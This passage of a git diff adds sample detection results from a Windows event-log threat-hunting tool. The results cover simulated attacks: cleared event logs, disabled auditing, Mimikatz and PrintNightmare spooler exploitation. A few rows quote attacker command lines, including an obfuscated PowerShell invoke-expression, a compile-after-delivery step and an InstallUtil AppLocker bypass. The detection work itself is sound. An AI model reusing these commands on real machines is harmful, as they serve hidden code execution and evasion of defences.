admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx +2021-10-26 03:11:11.559 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx +2021-10-26 03:11:11.575 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx +2021-10-26 03:11:11.622 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx +2021-10-26 03:11:11.700 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx +2021-10-26 03:11:11.747 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx +2021-10-26 03:11:11.778 
+09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx +2021-10-26 03:11:11.825 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx +2021-10-26 03:11:11.841 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx +2021-10-26 03:11:11.856 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx +2021-10-26 03:11:11.872 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx +2021-10-26 03:11:11.888 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event 
logs/ID104-1102-Event log cleared.evtx +2021-10-26 03:11:11.903 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx +2021-10-26 03:11:11.997 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx +2021-10-26 03:11:12.059 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx +2021-10-26 03:11:12.075 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx +2021-10-26 03:11:12.106 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx +2021-10-26 03:11:12.153 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: 
admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx +2021-10-26 03:11:12.184 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx +2021-10-26 03:11:12.247 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx +2021-10-26 03:21:02.504 +09:00,FS03.offsec.lan,1102,high,Security log was cleared,User: admmig,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID4688-Audit policy enumerated.evtx +2021-10-26 03:30:36.515 +09:00,FS03.offsec.lan,4719,high,Disabling Windows Event Auditing,,rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.xxx-Audit policy disabled/ID4719-Audit policy deactivation.evtx +2021-10-26 03:30:36.515 +09:00,FS03.offsec.lan,4719,high,Disabling Windows Event Auditing,,rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.xxx-Audit policy disabled/ID4719-Audit policy deactivation.evtx +2021-10-26 03:30:36.515 +09:00,FS03.offsec.lan,4719,high,Disabling Windows Event 
Auditing,,rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.xxx-Audit policy disabled/ID4719-Audit policy deactivation.evtx +2021-10-26 03:30:36.515 +09:00,FS03.offsec.lan,4719,high,Disabling Windows Event Auditing,,rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.xxx-Audit policy disabled/ID4719-Audit policy deactivation.evtx +2021-10-26 03:30:36.515 +09:00,FS03.offsec.lan,4719,high,Disabling Windows Event Auditing,,rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.xxx-Audit policy disabled/ID4719-Audit policy deactivation.evtx +2021-10-26 03:30:36.515 +09:00,FS03.offsec.lan,4719,high,Disabling Windows Event Auditing,,rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.xxx-Audit policy disabled/ID4719-Audit policy deactivation.evtx +2021-10-26 03:30:36.515 +09:00,FS03.offsec.lan,4719,high,Disabling Windows Event Auditing,,rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.xxx-Audit policy disabled/ID4719-Audit policy deactivation.evtx +2021-10-26 03:30:36.515 +09:00,FS03.offsec.lan,4719,high,Disabling Windows Event Auditing,,rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.xxx-Audit policy disabled/ID4719-Audit policy deactivation.evtx +2021-10-26 03:30:36.515 +09:00,FS03.offsec.lan,4719,high,Disabling Windows Event Auditing,,rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.xxx-Audit policy disabled/ID4719-Audit policy deactivation.evtx +2021-10-26 03:30:36.515 
+09:00,FS03.offsec.lan,4719,high,Disabling Windows Event Auditing,,rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.xxx-Audit policy disabled/ID4719-Audit policy deactivation.evtx +2021-10-26 03:30:36.515 +09:00,FS03.offsec.lan,4719,high,Disabling Windows Event Auditing,,rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.xxx-Audit policy disabled/ID4719-Audit policy deactivation.evtx +2021-10-26 03:30:36.515 +09:00,FS03.offsec.lan,4719,high,Disabling Windows Event Auditing,,rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.xxx-Audit policy disabled/ID4719-Audit policy deactivation.evtx +2021-10-26 03:30:36.515 +09:00,FS03.offsec.lan,4719,high,Disabling Windows Event Auditing,,rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.xxx-Audit policy disabled/ID4719-Audit policy deactivation.evtx +2021-10-26 03:30:36.515 +09:00,FS03.offsec.lan,4719,high,Disabling Windows Event Auditing,,rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.xxx-Audit policy disabled/ID4719-Audit policy deactivation.evtx +2021-10-26 03:30:36.515 +09:00,FS03.offsec.lan,4719,high,Disabling Windows Event Auditing,,rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.xxx-Audit policy disabled/ID4719-Audit policy deactivation.evtx +2021-10-26 03:30:36.515 +09:00,FS03.offsec.lan,4719,high,Disabling Windows Event Auditing,,rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.xxx-Audit policy disabled/ID4719-Audit policy deactivation.evtx 
+2021-10-26 03:30:36.515 +09:00,FS03.offsec.lan,4719,high,Disabling Windows Event Auditing,,rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.xxx-Audit policy disabled/ID4719-Audit policy deactivation.evtx +2021-10-26 03:30:36.515 +09:00,FS03.offsec.lan,4719,high,Disabling Windows Event Auditing,,rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.xxx-Audit policy disabled/ID4719-Audit policy deactivation.evtx +2021-10-26 03:30:36.515 +09:00,FS03.offsec.lan,4719,high,Disabling Windows Event Auditing,,rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.xxx-Audit policy disabled/ID4719-Audit policy deactivation.evtx +2021-10-26 03:30:36.515 +09:00,FS03.offsec.lan,4719,high,Disabling Windows Event Auditing,,rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.xxx-Audit policy disabled/ID4719-Audit policy deactivation.evtx +2021-10-26 03:30:36.515 +09:00,FS03.offsec.lan,4719,high,Disabling Windows Event Auditing,,rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.xxx-Audit policy disabled/ID4719-Audit policy deactivation.evtx +2021-10-26 03:30:36.515 +09:00,FS03.offsec.lan,4719,high,Disabling Windows Event Auditing,,rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.xxx-Audit policy disabled/ID4719-Audit policy deactivation.evtx +2021-10-26 03:30:36.515 +09:00,FS03.offsec.lan,4719,high,Disabling Windows Event Auditing,,rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.xxx-Audit policy disabled/ID4719-Audit 
policy deactivation.evtx +2021-10-26 03:30:36.515 +09:00,FS03.offsec.lan,4719,high,Disabling Windows Event Auditing,,rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.xxx-Audit policy disabled/ID4719-Audit policy deactivation.evtx +2021-10-26 03:30:36.515 +09:00,FS03.offsec.lan,4719,high,Disabling Windows Event Auditing,,rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.xxx-Audit policy disabled/ID4719-Audit policy deactivation.evtx +2021-10-26 03:30:36.515 +09:00,FS03.offsec.lan,4719,high,Disabling Windows Event Auditing,,rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.xxx-Audit policy disabled/ID4719-Audit policy deactivation.evtx +2021-10-26 03:30:36.515 +09:00,FS03.offsec.lan,4719,high,Disabling Windows Event Auditing,,rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.xxx-Audit policy disabled/ID4719-Audit policy deactivation.evtx +2021-10-26 03:30:36.515 +09:00,FS03.offsec.lan,4719,high,Disabling Windows Event Auditing,,rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.xxx-Audit policy disabled/ID4719-Audit policy deactivation.evtx +2021-10-26 03:30:36.515 +09:00,FS03.offsec.lan,4719,high,Disabling Windows Event Auditing,,rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.xxx-Audit policy disabled/ID4719-Audit policy deactivation.evtx +2021-10-26 03:30:36.515 +09:00,FS03.offsec.lan,4719,high,Disabling Windows Event Auditing,,rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.xxx-Audit 
policy disabled/ID4719-Audit policy deactivation.evtx +2021-10-27 19:09:16.280 +09:00,fs03vuln.offsec.lan,823,critical,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0004-Privilege Escalation/T1574-DLL side-loading/ID316,300,301,316,823,848-Mimispool printer server installation (PrintNightmare).evtx" +2021-10-27 19:12:47.151 +09:00,fs03vuln.offsec.lan,4674,critical,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4674,5142-Mimikatz print spool privileges requested.evtx" +2021-10-27 19:12:47.229 +09:00,fs03vuln.offsec.lan,5142,critical,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4674,5142-Mimikatz print spool privileges requested.evtx" +2021-10-27 19:12:47.323 +09:00,fs03vuln.offsec.lan,823,critical,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0004-Privilege Escalation/T1574-DLL side-loading/ID316,300,301,316,823,848-Mimispool printer server installation (PrintNightmare).evtx" +2021-10-27 19:14:21.369 +09:00,fs03vuln.offsec.lan,302,critical,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0004-Privilege Escalation/T1574-DLL side-loading/ID316,300,301,316,823,848-Mimispool printer server installation (PrintNightmare).evtx" +2021-10-27 19:14:21.369 +09:00,fs03vuln.offsec.lan,849,critical,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0004-Privilege Escalation/T1574-DLL side-loading/ID316,300,301,316,823,848-Mimispool printer server installation (PrintNightmare).evtx" +2021-10-27 19:14:21.369 +09:00,fs03vuln.offsec.lan,301,critical,Mimikatz 
Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0004-Privilege Escalation/T1574-DLL side-loading/ID316,300,301,316,823,848-Mimispool printer server installation (PrintNightmare).evtx" +2021-10-27 19:14:27.403 +09:00,fs03vuln.offsec.lan,823,critical,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0004-Privilege Escalation/T1574-DLL side-loading/ID316,300,301,316,823,848-Mimispool printer server installation (PrintNightmare).evtx" +2021-10-27 19:14:27.403 +09:00,fs03vuln.offsec.lan,4674,critical,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4674,5142-Mimikatz print spool privileges requested.evtx" +2021-10-27 19:14:27.466 +09:00,fs03vuln.offsec.lan,848,critical,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0004-Privilege Escalation/T1574-DLL side-loading/ID316,300,301,316,823,848-Mimispool printer server installation (PrintNightmare).evtx" +2021-10-27 19:14:27.466 +09:00,fs03vuln.offsec.lan,5142,critical,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4674,5142-Mimikatz print spool privileges requested.evtx" +2021-10-27 19:14:27.559 +09:00,fs03vuln.offsec.lan,823,critical,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0004-Privilege Escalation/T1574-DLL side-loading/ID316,300,301,316,823,848-Mimispool printer server installation (PrintNightmare).evtx" +2021-10-27 19:14:27.559 +09:00,fs03vuln.offsec.lan,300,critical,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0004-Privilege Escalation/T1574-DLL side-loading/ID316,300,301,316,823,848-Mimispool printer server 
installation (PrintNightmare).evtx" +2021-10-27 19:28:26.260 +09:00,FS03.offsec.lan,354,high,Possible CVE-2021-1675 Print Spooler Exploitation,,rules/sigma/other/printservice/win_exploit_cve_2021_1675_printspooler.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0004-Privilege Escalation/T1574-DLL side-loading/ID354-808-Mimispool printer installation (PrintNightmare).evtx +2021-10-27 19:28:26.260 +09:00,FS03.offsec.lan,354,critical,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0004-Privilege Escalation/T1574-DLL side-loading/ID354-808-Mimispool printer installation (PrintNightmare).evtx +2021-10-27 19:28:26.307 +09:00,FS03.offsec.lan,823,critical,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0004-Privilege Escalation/T1574-DLL side-loading/ID354-808-Mimispool printer installation (PrintNightmare).evtx +2021-10-27 19:34:49.837 +09:00,FS03.offsec.lan,6416,critical,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4674,6416 New external device connected (PrintNightmare).evtx" +2021-10-27 19:34:50.024 +09:00,FS03.offsec.lan,4674,critical,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4674,6416 New external device connected (PrintNightmare).evtx" +2021-10-28 22:41:21.325 +09:00,FS03.offsec.lan,1,high,Process Creation Sysmon Rule Alert,"Rule: technique_id=T1059,technique_name=Command-Line Interface : Command: ""cmd.exe"" : Path: C:\Windows\System32\cmd.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\System32\spoolsv.exe",rules/hayabusa/sysmon/alerts/1_ProcessCreationSysmonAlert.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0004-Privilege Escalation/T1574-DLL side-loading/1-Print spool spawned a CMD shell (PrintNightMare).evtx +2021-10-28 
22:41:21.325 +09:00,FS03.offsec.lan,1,high,Abused Debug Privilege by Arbitrary Parent Processes,,rules/sigma/process_creation/sysmon_abusing_debug_privilege.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0004-Privilege Escalation/T1574-DLL side-loading/1-Print spool spawned a CMD shell (PrintNightMare).evtx +2021-11-02 23:15:23.676 +09:00,fs03vuln.offsec.lan,1102,high,Security log was cleared,User: admmig,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1140-Deobfuscate-Decode Files or Information/ID4688-Certutil download.evtx +2021-11-09 00:01:27.604 +09:00,fs03vuln.offsec.lan,1,high,Process Creation Sysmon Rule Alert,"Rule: technique_id=T1086,technique_name=PowerShell : Command: powershell $env:I4Pzl|.(Get-C`ommand ('{1}e{0}'-f'x','i')) : Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe : User: OFFSEC\admmig : Parent Command: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding",rules/hayabusa/sysmon/alerts/1_ProcessCreationSysmonAlert.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID1-WMI spwaning PowerShell process - WMImplant.evtx +2021-11-09 00:01:27.604 +09:00,fs03vuln.offsec.lan,1,high,Wmiprvse Spawning Process,,rules/sigma/process_creation/win_wmiprvse_spawning_process.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID1-WMI spwaning PowerShell process - WMImplant.evtx +2021-11-09 00:01:27.604 +09:00,fs03vuln.offsec.lan,1,high,Suspicious PowerShell Parent Process,,rules/sigma/process_creation/win_susp_powershell_parent_process.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID1-WMI spwaning PowerShell process - WMImplant.evtx +2021-11-09 00:01:27.604 +09:00,fs03vuln.offsec.lan,1,low,Non Interactive 
PowerShell,,rules/sigma/process_creation/win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID1-WMI spwaning PowerShell process - WMImplant.evtx +2021-11-09 00:01:27.604 +09:00,fs03vuln.offsec.lan,1,high,WMI Spawning Windows PowerShell,,rules/sigma/process_creation/win_wmi_spwns_powershell.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID1-WMI spwaning PowerShell process - WMImplant.evtx +2021-11-18 16:40:29.566 +09:00,PC-01.cybercat.local,1,high,Process Creation Sysmon Rule Alert,"Rule: technique_id=T1059,technique_name=Command-Line Interface : Command: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe /unsafe /nologo /target:exe /out:zoom-update.exe C:\Users\pc1-user\Desktop\zoom-update.cs : Path: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe : User: CYBERCAT\pc1-user : Parent Command: ""C:\Windows\system32\cmd.exe"" ",rules/hayabusa/sysmon/alerts/1_ProcessCreationSysmonAlert.yml,../hayabusa-sample-evtx/YamatoSecurity/T1027.004_Obfuscated Files or Information Compile After Delivery/sysmon.evtx +2021-11-18 16:42:54.822 +09:00,PC-01.cybercat.local,1,high,Process Creation Sysmon Rule Alert,"Rule: technique_id=T1218.004,technique_name=InstallUtil : Command: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe /logfile= /LogToConsole=false /U C:\Users\pc1-user\Desktop\zoom-update.exe : Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe : User: CYBERCAT\pc1-user : Parent Command: ""C:\Windows\system32\cmd.exe"" ",rules/hayabusa/sysmon/alerts/1_ProcessCreationSysmonAlert.yml,../hayabusa-sample-evtx/YamatoSecurity/T1218.004_Signed Binary Proxy Execution InstallUtil/sysmon.evtx +2021-11-18 16:42:54.822 +09:00,PC-01.cybercat.local,1,low,Possible Applocker Bypass,,rules/sigma/process_creation/win_possible_applocker_bypass.yml,../hayabusa-sample-evtx/YamatoSecurity/T1218.004_Signed Binary 
Proxy Execution InstallUtil/sysmon.evtx
\ No newline at end of file
diff --git a/sample-results/hayabusa-sample-evtx-ResultsDeprecatedAndNoisyRulesEnabled.xlsx b/sample-results/hayabusa-sample-evtx-ResultsDeprecatedAndNoisyRulesEnabled.xlsx
new file mode 100644
index 00000000..96bbd972
Binary files /dev/null and b/sample-results/hayabusa-sample-evtx-ResultsDeprecatedAndNoisyRulesEnabled.xlsx differ